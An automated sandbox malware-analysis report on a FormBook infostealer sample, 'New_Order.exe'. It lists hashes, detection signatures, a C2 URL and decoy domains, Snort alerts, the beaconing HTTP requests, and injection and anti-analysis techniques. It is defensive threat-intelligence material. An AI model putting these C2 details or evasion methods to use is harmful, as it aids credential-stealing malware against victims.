Analysis Report New_Order.exe

Overview

General Information

Sample Name: New_Order.exe
Analysis ID: 411746
MD5: 74e4eb9afbf8f9c9b285a46ced831979
SHA1: 8d65df9dc971c859f0a86a158d9576f528603410
SHA256: 68c72cdcc504fcbffe3d6219cbeeed9586e0e362f073070eda7c0b4ed962d14a
Tags: exeFormbook
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Dridex Process Pattern
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.voiceclubdubai.com/icsm/"], "decoy": ["roastedorganic.com", "dh1002020.com", "yologgook.com", "bg1133.com", "letsreflectonline.net", "year-action.xyz", "shanghainternational.com", "lanarkshirecleaningservices.com", "ahorradoramente.com", "kantan-sedori.com", "arshpowerelectrical.com", "thepagan.life", "hkequan.com", "1ratedfivegnetwork.com", "desailldada.com", "algaeflipflops.com", "connorneill.com", "fareblog01.com", "fjfortuny.com", "logictech.info", "bathtest.com", "truckwellfreight.com", "guesttransparent.com", "coffeyquiltco.com", "goorganickw.com", "12clyderoad.com", "hdjakdhf.com", "meloncholica.com", "happyfingersfood.com", "web3kit.com", "tmtbarsuppliers.com", "blackradstore.com", "lomejorparasalud.com", "dasabito.com", "shopperzguide.com", "portsalernoboatrental.com", "keywestshaman.com", "clarocrdemo.com", "cafesmexico.com", "lagemanndentistry.com", "nortonviggiano.com", "accuworkflow.com", "cankuntech.com", "the-evening-code.com", "westervillelegends.com", "susanestuart.com", "cunerier.com", "nicustoms.academy", "avocats-biaisetassocies.com", "w-c727or.net", "websitemax.co.uk", "nrlalivelearning.com", "thehostessedit.com", "heauxceaux.com", "case72-paypal.com", "charmboutiques.com", "thelordnelsonwinthorpe.com", "landbkids.com", "mowingpedia.com", "katherinegazda.com", "geacasolaro.com", "masautonomo.com", "quietaustraliansstandup.com", "bellarealestatebkk.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll ReversingLabs: Detection: 44%
Multi AV Scanner detection for submitted file
Source: New_Order.exe Virustotal: Detection: 38%
Source: New_Order.exe ReversingLabs: Detection: 59%
Yara detected FormBook
Source: Yara match File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: New_Order.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.New_Order.exe.24e0000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.svchost.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: New_Order.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: New_Order.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscript.pdbGCTL source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.237522923.0000000003700000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, wscript.exe
Source: Binary string: wscript.pdb source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source: Binary string: svchost.pdb source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source: Binary string: svchost.pdbUGP source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_0040646B FindFirstFileA,FindClose, 0_2_0040646B
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004058BF

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop esi 1_2_0041581A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop edi 1_2_0040C3EA
Source: C:\Windows\SysWOW64\wscript.exe Code function: 4x nop then pop esi 7_2_0062581A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 4x nop then pop edi 7_2_0061C3EA

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.voiceclubdubai.com/icsm/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.year-action.xyz
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1 Host: www.roastedorganic.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1 Host: www.voiceclubdubai.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1 Host: www.geacasolaro.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1 Host: www.charmboutiques.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1 Host: www.websitemax.co.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1 Host: www.year-action.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1 Host: www.hdjakdhf.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1 Host: www.susanestuart.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 75.2.115.196
Source: Joe Sandbox View IP Address: 23.227.38.74
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US
Source: Joe Sandbox View ASN Name: ARUBA-ASNIT
Source: Joe Sandbox View ASN Name: TELEPOINTBG
Source: unknown DNS traffic detected: queries for: www.roastedorganic.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: openresty Date: Wed, 12 May 2021 04:11:08 GMT Content-Type: text/html; charset=utf-8 Content-Length: 253 Connection: close X-Varnish: 824312071 Retry-After: 5 Data Ascii: <!DOCTYPE html><html> <head> <title>404 Not Found</title> </head> <body> <h1>Error 404 Not Found</h1> <p>Not Found</p> <h3>Guru Meditation:</h3> <p>XID: 824312071</p> <hr> <p>Varnish cache server</p> </body></html>
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: New_Order.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: New_Order.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: wscript.exe, 00000007.00000002.498023186.0000000004EF2000.00000004.00000001.sdmp String found in binary or memory: https://www.lcn.com/parked-domains/index?/=/domain/websitemax.co.uk

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040535C

E-Banking Fraud:

Yara detected FormBook

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: New_Order.exe
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004181C0 NtCreateFile, 1_2_004181C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00418270 NtReadFile, 1_2_00418270
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004182F0 NtClose, 1_2_004182F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004183A0 NtAllocateVirtualMemory, 1_2_004183A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004181BA NtCreateFile, 1_2_004181BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004182EA NtClose, 1_2_004182EA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041839B NtAllocateVirtualMemory, 1_2_0041839B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_03969A00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969A20 NtResumeThread,LdrInitializeThunk, 1_2_03969A20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969A50 NtCreateFile,LdrInitializeThunk, 1_2_03969A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039699A0 NtCreateSection,LdrInitializeThunk, 1_2_039699A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_03969910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039698F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_039698F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969840 NtDelayExecution,LdrInitializeThunk, 1_2_03969840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_03969860
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969780 NtMapViewOfSection,LdrInitializeThunk, 1_2_03969780
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039697A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_039697A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969FE0 NtCreateMutant,LdrInitializeThunk, 1_2_03969FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969710 NtQueryInformationToken,LdrInitializeThunk, 1_2_03969710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039696E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_039696E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_03969660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039695D0 NtClose,LdrInitializeThunk, 1_2_039695D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969540 NtReadFile,LdrInitializeThunk, 1_2_03969540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396A3B0 NtGetContextThread, 1_2_0396A3B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969B00 NtSetValueKey, 1_2_03969B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969A80 NtOpenDirectoryObject, 1_2_03969A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969A10 NtQuerySection, 1_2_03969A10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039699D0 NtCreateProcessEx, 1_2_039699D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969950 NtQueueApcThread, 1_2_03969950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039698A0 NtWriteVirtualMemory, 1_2_039698A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969820 NtEnumerateKey, 1_2_03969820
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396B040 NtSuspendThread, 1_2_0396B040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396A710 NtOpenProcessToken, 1_2_0396A710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969730 NtQueryVirtualMemory, 1_2_03969730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969770 NtSetInformationFile, 1_2_03969770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396A770 NtOpenThread, 1_2_0396A770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969760 NtOpenProcess, 1_2_03969760
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039696D0 NtCreateKey, 1_2_039696D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969610 NtEnumerateValueKey, 1_2_03969610
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969650 NtQueryValueKey, 1_2_03969650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969670 NtQueryInformationProcess, 1_2_03969670
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039695F0 NtQueryInformationFile, 1_2_039695F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396AD30 NtSetContextThread, 1_2_0396AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969520 NtWaitForSingleObject, 1_2_03969520
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03969560 NtWriteFile, 1_2_03969560
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9840 NtDelayExecution,LdrInitializeThunk, 7_2_048A9840
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9860 NtQuerySystemInformation,LdrInitializeThunk, 7_2_048A9860
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A99A0 NtCreateSection,LdrInitializeThunk, 7_2_048A99A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A95D0 NtClose,LdrInitializeThunk, 7_2_048A95D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_048A9910
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9540 NtReadFile,LdrInitializeThunk, 7_2_048A9540
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A96D0 NtCreateKey,LdrInitializeThunk, 7_2_048A96D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_048A96E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9650 NtQueryValueKey,LdrInitializeThunk, 7_2_048A9650
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9A50 NtCreateFile,LdrInitializeThunk, 7_2_048A9A50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_048A9660
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9780 NtMapViewOfSection,LdrInitializeThunk, 7_2_048A9780
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9FE0 NtCreateMutant,LdrInitializeThunk, 7_2_048A9FE0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9710 NtQueryInformationToken,LdrInitializeThunk, 7_2_048A9710
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A98A0 NtWriteVirtualMemory, 7_2_048A98A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A98F0 NtReadVirtualMemory, 7_2_048A98F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9820 NtEnumerateKey, 7_2_048A9820
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048AB040 NtSuspendThread, 7_2_048AB040
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A99D0 NtCreateProcessEx, 7_2_048A99D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A95F0 NtQueryInformationFile, 7_2_048A95F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048A9520 NtWaitForSingleObject, 7_2_048A9520
